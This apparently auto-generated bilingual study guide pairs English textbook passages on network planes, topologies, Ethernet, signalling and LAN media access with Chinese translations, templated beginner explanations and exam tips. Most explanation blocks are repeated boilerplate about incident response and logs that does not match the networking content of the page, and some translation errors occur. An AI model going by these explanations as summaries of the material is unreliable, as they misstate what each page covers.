首先,网络拓扑是指设备和连接的物理 或逻辑布局,包括总线、环形、星形、网状、树形和混合等配置。 所选择的拓 扑结构会影响可扩展性、容错性和管理便利性等因素。 网络拓扑将在下一节中 讨论。 其次,传输架构通常关注平面的概念。 网络架构平面的概念是指将网络功能和 职责划分为不同的层或平面,每个平面承担特定的职责。 这种分离有助于组织 和管理网络操作的不同方面。 网络架构中的三个主要平面是数据平面、控制平 面和管理平面。 数据平面,或称转发平面,负责在网络设备之间传输用户

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 816 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 99 / PDF P817

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

data between network devices, performing tasks like packet forwarding, switching, and routing. The control plane manages and maintains forwarding tables used by the data plane, handling activities such as routing protocols and decision-making on data forwarding. The management plane is in charge of overall network device administration, covering tasks like configuration, monitoring, performance analysis, and network maintenance. The separation of these planes allows for modular design, scalability, and the ability to upgrade or modify one plane without affecting the others.

A third critical consideration in transport architecture is the choice between cut-through and store-and-forward switching. Cut-through switching forwards a frame as soon as it reads the destination address, providing low latency and suitability for low-latency applications. On the other hand, storeand-forward switching receives and stores the entire frame in a buffer before forwarding, offering greater error checking and suitability for ensuring data integrity. The selection between cut-through and store-and-forward depends on factors such as network requirements, latency sensitivity, and the level of error checking needed.

Understanding and designing the transport architecture is essential for optimizing network performance, managing resources efficiently, and ensuring that the network meets its intended requirements. Network Topologies The physical layout and organization of computers and networking devices is known as the network topology. The logical topology is the grouping of networked systems into trusted collectives. The physical topology is not always the same as the logical topology. There are four basic topologies of the physical layout of a network: Ring Topology A ring topology connects each system as points on a circle (see Figure 11.9).

The connection medium acts as a unidirectional transmission loop. Only one system can transmit data at a time. Traffic management is performed by a token. A token is a digital hall pass that travels around the ring until a system grabs it. A system in possession of the token can transmit data. Data and the token are transmitted to a specific destination. As the data travels around the loop, each system checks to see whether it is the intended recipient of the data. If not, it passes the token on. If so, it reads the data. Once the data is received, the token is released and returns to traveling around the loop until another system grabs it. If any one

中文直译 / 整理

数据,执行数据包转发、交换和路由等任务。 控制平面管理并维护数据平面使 用的转发表,处理路由协议和数据转发决策等活动。 管理平面负责整个网络设 备的管理,涵盖配置、监控、性能分析和网络维护等任务。 这些平面的分离使 得系统具有模块化设计、可扩展性,并允许在不影响其他平面的情况下升级或 修改某个平面。 在传输架构中,第三个关键考虑因素是选择直通交换还是存储转发交换。 直通 交换在读取目的地址后立即转发帧,提供低延迟,适用于低延迟应用。 另一方 面,存储转发交换在转发前会接收并整个帧存储在缓冲区中,提供更强的错误 检查能力,适用于确保数据完整性。 直通交换与存储转发交换的选择取决于网 络需求、延迟敏感性以及所需的错误检查级别。 理解和设计传输架构对于优化网络性能、高效管理资源以及确保网络满 足预期需求至关重要。 网络拓扑 计算机和网络设备的物理布局与组织称为网络拓扑。 逻辑拓扑是将联网系统划 分为可信集合。 物理拓扑并不总是与逻辑拓扑相同。 网络的物理布局有四种基 本拓扑: 环形拓扑 A 环形拓扑 将每个系统连接为圆上的点(见图 11.9)。 连接介质充 当单向传输环。 一次只有一个系统可以传输数据。 流量管理由令牌执行。

令牌是 一个数字通行证,它在环中循环,直到某个系统获取它。 拥有令牌的系统可以传 输数据。 数据和令牌被发送到特定目的地。 当数据在环中传输时,每个系统都会 检查自己是否为数据的预期接收者。 如果不是,它将令牌传递下去; 如果是,它 就会读取数据。 一旦数据被接收,令牌就被释放并继续在环中循环,直到另一个 系统获取它。 如果环的任何一段

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 100 / PDF P818

第 818 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

segment of the loop is broken, all communication around the loop ceases. Some implementations of ring topologies employ a fault tolerance mechanism, such as dual loops running in opposite directions, to prevent single points of failure. FIGURE 11.9 A ring topology Bus Topology A bus topology connects each system to a trunk or backbone cable. All systems on the bus can transmit data simultaneously, which can result in collisions. A collision occurs when two systems transmit data at the same time; the signals interfere with each other. To avoid this, the

中文直译 / 整理

断开,环中的所有通信都将停止。 一些环形拓扑的实现采用了容错机制, 例如双向运行的双环,以防止单点故障。 图 11.9 环形拓扑 总线拓扑一种总线拓扑将每个系统连接到一条主干电缆或总线。 总线上的所有 系统可以同时传输数据,这可能导致冲突。 当两个系统同时传输数据时,就会 发生冲突; 信号会相互干扰。 为避免这种情况,

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 818 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 101 / PDF P819

第 819 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

systems employ a collision avoidance mechanism that basically “listens” for any other currently occurring traffic. If traffic is heard, the system waits a few moments and listens again. If no traffic is heard, the system transmits its data. When data is transmitted on a bus topology, all systems on the network hear the data. If the data is not addressed to a specific system, that system just ignores the data. The benefit of a bus topology is that if a single segment fails, communications on all other segments continue uninterrupted. However, the central trunk line remains a single point of failure. There are two types of bus topologies: linear and tree.

A linear bus topology employs a single trunk line with all systems directly connected to it. A tree topology employs a single trunk line with branches that can support multiple systems. Figure 11.10 illustrates both types. The primary reason a bus is rarely if ever used today is that it must be terminated at both ends and any disconnection can take down the entire network. FIGURE 11.10 A linear bus topology and a tree bus topology Star Topology A star topology employs a centralized connection device. This device can be a simple hub or switch. Each system is connected to the central hub by a dedicated segment (see Figure 11.11).

If any one segment fails, the other segments can continue to function. However, the central hub is a single point of failure. Generally, the star topology uses less cabling than other topologies and makes the identification of damaged cables easier.

中文直译 / 整理

系统采用一种冲突避免机制,基本原理是“侦听”当前是否有其他流量。 如果检测到流量,系统会等待片刻后再重新侦听。 如果没有检测到流量,系统 就会传输其数据。 在总线拓扑中传输数据时,网络上的所有系统都会接收到该 数据。 如果数据不是发给某个特定系统的,该系统就会忽略该数据。 总线拓扑 的优点是,如果某一段发生故障,其他所有段的通信仍能继续正常进行。 然而, 主干电缆仍然是单点故障。 总线拓扑有两种类型:线性总线和树形总线。 线性总线拓扑使用单条主干线路, 所有系统直接连接到该线路。 树形总线拓扑也使用单条主干线路,但带有分支, 可支持多个系统。 图11.10展示了这两种类型。 总线拓扑如今几乎从不使用的主 要原因是,它必须在两端进行端接,任何断开都会导致整个网络瘫痪。 图11.10线性总线拓扑和树形总线拓扑 星型拓扑 A 星型拓扑采用集中式连接设备。 该设备可以是简单的集线器或交 换机。 每个系统通过专用链路连接到中心集线器(见图11.11)。 如果任意一条 链路发生故障,其他链路仍可正常工作。 然而,中心集线器是单点故障。 通常, 星型拓扑比其他拓扑使用的电缆更少,并且更容易识别损坏的电缆。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 819 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 102 / PDF P820

第 820 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 11.11 A star topology A logical bus can be implemented as a physical star. Ethernet is a bus-based technology. It can be deployed as a physical star, but the hub or switch device is actually internally a logical bus connection device. Mesh Topology A mesh topology connects systems to other systems using numerous paths (see Figure 11.12). A full-mesh topology connects each system to all other systems on the network. A partial-mesh topology connects many systems to many other systems. Mesh topologies provide redundant connections to systems, allowing multiple segment failures without seriously affecting connectivity.

中文直译 / 整理

图 11.11 星型拓扑 逻辑总线可以以物理星型形式实现。 以太网是一种基于总线的技术,它可以部 署为物理星型,但集线器或交换机设备在内部实际上是一个逻辑总线连接设备。 网状拓扑 A 网状拓扑 使用大量路径将系统相互连接(见图 11.12)。 完全网状 拓扑将每个系统连接到网络上的所有其他系统。 部分网状拓扑将许多系统连接到 许多其他系统。 网状拓扑为系统提供冗余连接,即使多个段发生故障,也不会严 重影响连通性。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 820 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 103 / PDF P821

第 821 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 11.12 A mesh topology Ethernet Ethernet is a shared-media LAN technology (aka a broadcast technology). That means it allows numerous devices to communicate over the same medium but requires that the devices take turns communicating and performing collision detection and avoidance. Ethernet employs broadcast and collision domains (see the general feature “Collision Domains vs. Broadcast Domains”). Ethernet is an example of a media access methodology.

中文直译 / 整理

图 11.12 网状拓扑 以太网 以太网 是一种共享介质的局域网技术(也称为广播技术)。 这意味着它允许多 个设备在同一介质上通信,但要求设备轮流通信并执行冲突检测与避免。 以太 网采用广播域和冲突域(参见通用功能“冲突域与广播域”)。 以太网是介质 访问方法的一个示例。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 821 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 104 / PDF P822

第 822 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Ethernet can support full-duplex communications (in other words, full twoway) and usually employs twisted-pair cabling. (Coaxial cabling was originally used.) Ethernet is most often deployed on star or bus topologies. Ethernet is based on the IEEE 802.3 standard. Individual units of Ethernet data are called frames. Fast Ethernet supports 100 Mbps throughput. Gigabit Ethernet supports 1,000 Mbps (1 Gbps) throughput. 10 Gigabit Ethernet supports 10,000 Mbps (10 Gbps) throughput. Sub-Technologies Most networks comprise numerous technologies rather than a single technology.

For example, Ethernet is not just a single technology but a superset of sub-technologies that support its common and expected activity and behavior. Ethernet includes the technologies of digital communications, synchronous communications, and baseband communications, and it supports broadcast, multicast, unicast, and anycast communications and Carrier-Sense Multiple Access with Collision Detection (CSMA/CD). LAN technologies may include many of the sub-technologies described in the following sections. Analog and Digital One sub-technology common to many forms of network communications is the mechanism used to actually transmit signals over a physical medium, such as a cable.

There are two types: Analog communications occur with a continuous signal that varies in frequency, amplitude, phase, voltage, and so on. The variances in the continuous signal produce a wave shape (as opposed to the square shape of a digital signal). The actual communication occurs by variances in the constant signal. Digital communications occur through the use of a discontinuous electrical signal and a state change or on-off pulses. Digital signals are more reliable than analog signals over long distances or when interference is present.

This is because of a digital signal's definitive information storage method employing direct current voltage where voltageon represents a value of 1 and voltage-off represents a value of 0. These onoff pulses create a stream of binary data. Analog signals become altered and corrupted because of attenuation over long distances and interference. Since

中文直译 / 整理

以太网支持全双工通信(即双向全双工),通常采用双绞线电缆。 (最初使用 的是同轴电缆。 )以太网最常部署在星型或总线型拓扑中。 以太网基于IEEE 802.3标准。 以太网数据的单个单元称为帧。 快速以太网支持100 Mbps的吞吐 量。 千兆以太网支持1,000 Mbps(1 Gbps)的吞吐量。 10吉比特以太网支持 10,000 Mbps(10 Gbps)的吞吐量。 子技术 大多数网络由多种技术组成,而非单一技术。 例如,以太网不仅仅是一种单一 技术,而是一组支持其常见和预期活动与行为的子技术的超集。 以太网包括数 字通信、同步通信和基带通信技术,并支持广播、组播、单播和任播通信,以 及载波侦听多路访问/冲突检测(CSMA/CD)。 局域网技术可能包括以下部分描述的许多子技术。 模拟与数字 许多网络通信形式中共同的一种子技术是用于在物理介质(如电缆)上实际 传输信号的机制。 有两种类型: 模拟通信通过连续信号实现,该信号在频率、幅度、相位、电压等方面连 续变化。 连续信号的变化产生波形(与数字信号的方波形状相对)。 实际 通信通过恒定信号的变化实现。 数字通信通过不连续的电信号和状态变化或开关脉冲实现。

数字信号在长距离传输或存在干扰时比模拟信号更可靠。 这是因为数字信号采 用直流电压的明确信息存储方法,其中电压开启表示值为1,电压关闭表示值 为0。 这些开‑关脉冲形成了一串二进制数据。 模拟信号由于长距离传输中的衰 减和干扰而发生改变和失真。 由于

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 822 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 105 / PDF P823

第 823 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

an analog signal can have an infinite number of variations used for signal encoding as opposed to digital signals' two states, unwanted alterations to the signal make extraction of the data more difficult as the degradation increases. Synchronous and Asynchronous Some communications are synchronized with some sort of clock or timing activity. Communications are either synchronous or asynchronous: Synchronous communications rely on a timing or clocking mechanism based on either an independent clock or a timestamp embedded in the data stream. Synchronous communications are typically able to support very high rates of data transfer.

Asynchronous communications rely on stop and start delimiters to manage the transmission of data. Because of the use of delimiters and the stop and start nature of its transmission, asynchronous communication is best suited for smaller amounts of data. PSTN modems are good examples of asynchronous communication devices. Baseband and Broadband How many communications can occur simultaneously over a cable segment depends on whether you use baseband technology or broadband technology: Baseband technology can support only a single communication channel. It uses a direct current applied to the cable.

A current that is at a higher level represents the binary signal of 1, and a current that is at a lower level represents the binary signal of 0. Baseband is a form of digital signal. Ethernet is a baseband technology. Broadband technology can support multiple simultaneous signals. Broadband uses frequency modulation to support numerous channels, each supporting a distinct communication session. Broadband is suitable for high throughput rates, especially when several channels are multiplexed. Broadband is a form of analog signal. Cable television and cable modems, fiber optics, satellite, DSL, T1, and T3 are examples of broadband technologies.

Casting Technologies Casting technologies determine how many destinations a single transmission can reach:

中文直译 / 整理

模拟信号可用于信号编码的变体数量是无限的,而数字信号只有两种状态,因 此信号的非预期改变会随着退化加剧而使数据提取变得更加困难。 同步与异步 某些通信依赖于某种时钟或计时机制。 通信分为同步和异步两种: 同步通信依赖于基于独立时钟或嵌入数据流中的时间戳的计时机制。 同步 通信通常能够支持非常高的数据传输速率。 异步通信依赖于起始和停止分隔符来管理数据传输。 由于使用了分隔符 以及其起始和停止的传输特性,异步通信最适合传输较小量的数据。 PSTN调制解调器是异步通信设备的典型示例。 基带与宽带 在一段电缆上同时发生多少次通信,取决于您使用的是基带技术还是宽带技术: 基带技术仅能支持单个通信信道。 它使用施加在电缆上的直流电。 较高电 平的电流表示二进制信号1,较低电平的电流表示二进制信号0。 基带是一 种数字信号形式。 以太网是一种基带技术。 宽带技术可支持多个同时信号。 宽带使用频带调制来支持多个信道,每个 信道支持独立的通信会话。 宽带适用于高吞吐量速率,尤其是在多个信道 复用时。 宽带是一种模拟信号形式。 有线电视和电缆调制解调器、光纤、 卫星、DSL、T1和T3是宽带技术的例子。

铸造技术 投射技术决定了单次传输可以到达多少个目的地:

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 823 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 106 / PDF P824

第 824 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Broadcast technology supports communications to all possible recipients. Multicast technology supports communications to multiple specific recipients. Unicast technology supports only a single communication to a specific recipient. Anycast technology supports communications where a single sender transmits data to the nearest or best-suited node among a group of potential receivers. The goal is to deliver data to the “nearest” or “best” node in terms of network topology or routing metrics. Geocast technology supports communications where data is sent to all devices within a specific geographical area.

It is a one-to-all communication paradigm limited to a particular geographic region, and devices outside that area do not receive the broadcast. LAN Media Access Media access protocols in LANs dictate how multiple devices within a network contend for the right to access the shared communication medium. There are several methods used to manage and control access to the communication medium in LANs: Arbitration is a media access protocol where a central authority or a predefined set of rules determines which device has the right to access the communication medium at any given time.

Devices interested in transmitting data request permission from the central authority or follow established rules to access the medium. This approach is often used in centralized network architectures. Time Division Multiple Access (TDMA), as an example, divides time into fixed slots, and a central authority, such as a base station or network controller, assigns specific time slots to each device. Devices are allowed to transmit only during their allocated time slots, avoiding collisions. Deconfliction is a media access protocol that aims to avoid collisions and conflicts by assigning specific time slots or frequency bands to different devices for communication.

Each device is allocated a dedicated time slot or frequency range during which it can transmit data without interference from other devices. Time-division multiplexing (TDM) and

中文直译 / 整理

广播技术支持向所有可能的 接收者。 组播技术支持向多个特定的 接收者。 单播技术仅支持向特定接收者进行单次通信。 任播技术支持单个发送方将数据传输给一组潜在接收者中最近或最合适 的节点。 其目标是根据网络拓扑或路由度量,将数据传递到“最近”或 “最优”的节点。 地理播技术支持将数据发送到特定地理区域内的所有设备。 这是一种仅 限于特定地理区域的一对多通信范式,该区域外的设备不会接收广播。 局域网介质访问 局域网中的介质访问协议规定了网络内多个设备如何竞争共享通信介质的访 问权。 用于管理和控制局域网中通信介质访问的方法有多种: 仲裁是一种介质访问协议,其中由中央权威机构或预定义的一组规则决定 在任何给定时间哪个设备有权访问通信介质。 希望传输数据的设备需向中 央权威机构请求许可,或遵循既定规则来访问介质。 这种方法通常用于集 中式网络架构。 例如,时分多址(TDMA)将时间划分为固定时隙,由中 央权威机构(如基站或网络控制器)为每个设备分配特定的时隙。 设备仅 在分配的时隙内允许传输,从而避免冲突。 去冲突是一种媒体访问协议,旨在通过为不同设备分配特定的时间槽或频 段来避免碰撞和冲突。

每个设备被分配一个专用的时间槽或频段,在此期 间它可以传输数据而不受其他设备的干扰。 时分复用(TDM)和

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 824 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 107 / PDF P825

第 825 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

frequency-division multiplexing (FDM) are common techniques used for deconfliction. Contention-based protocols allow devices to contend for access to the communication medium. Devices transmit data when they have information to send and contend with other devices for the right to transmit. When multiple devices attempt to transmit simultaneously, collisions may occur. Contention-based protocols often include mechanisms to detect and manage collisions, such as Carrier Sense Multiple Access with Collision Detection (CSMA/CD) or Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA).

The choice of a specific media access protocol depends on factors such as network architecture, traffic patterns, and the desired trade-off between simplicity and efficiency. There are numerous LAN media access technologies that are used to avoid or prevent transmission collisions. These technologies define how multiple systems, all within the same collision domain, are to communicate. Some of these technologies actively prevent collisions, whereas others respond to collisions. Carrier-Sense Multiple Access (CSMA) This is an arbitration LAN media access technology that performs communications using the following steps: 1. The host listens to the LAN media to determine whether it is in use.

2. If the LAN media is not being used, the host transmits its communication. 3. The host waits for an acknowledgment. 4. If no acknowledgment is received after a timeout period, the host starts over at step 1. CSMA does not directly address collisions. If a collision occurs, the communication would not have been successful, and thus an acknowledgment would not be received. This causes the sending system to retransmit the data and perform the CSMA process again. Carrier-Sense Multiple Access with Collision Detection (CSMA/CD) This is a contention-based LAN media access technology that performs communications using the following steps:

中文直译 / 整理

频分复用(FDM)是用于去冲突的常用技术。 基于竞争的协议允许设备竞争对通信介质的访问权。 当设备有数据要发 送时,它们会传输数据并与其他设备竞争传输权利。 当多个设备同时尝 试传输时,可能会发生冲突。 基于竞争的协议通常包含检测和管理冲突 的机制,例如载波侦听多路访问/冲突检测(CSMA/CD)或载波侦听多 路访问/冲突避免(CSMA/CA)。 特定介质访问协议的选择取决于网络架构、流量模式以及在简单性和效率 之间所需的权衡等因素。 有许多局域网介质访问技术用于避免或防止传输冲突。 这些技术定义了同一冲 突域内的多个系统如何进行通信。 其中一些技术主动防止冲突,而另一些则对 冲突做出响应。 载波侦听多路访问(CSMA)这是一种仲裁型局域网介质访问技术,其通信步骤如 下: 1. 主机监听局域网介质,以确定其是否正在使用中。 2. 如果未使用局域网介质,主机将传输其通信。 3. 主机等待确认。 4. 如果在超时后仍未收到确认,主机将从第1步重新开始。 CSMA 并未直接处理碰撞。 如果发生碰撞,通信将不会成功,因此不会收到 确认。 这将导致发送系统重新传输数据并再次执行 CSMA 过程。

载波侦听多路访问/冲突检测(CSMA/CD)这是一种基于竞争的局域网媒体 访问技术,其通信过程遵循以下步骤:

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

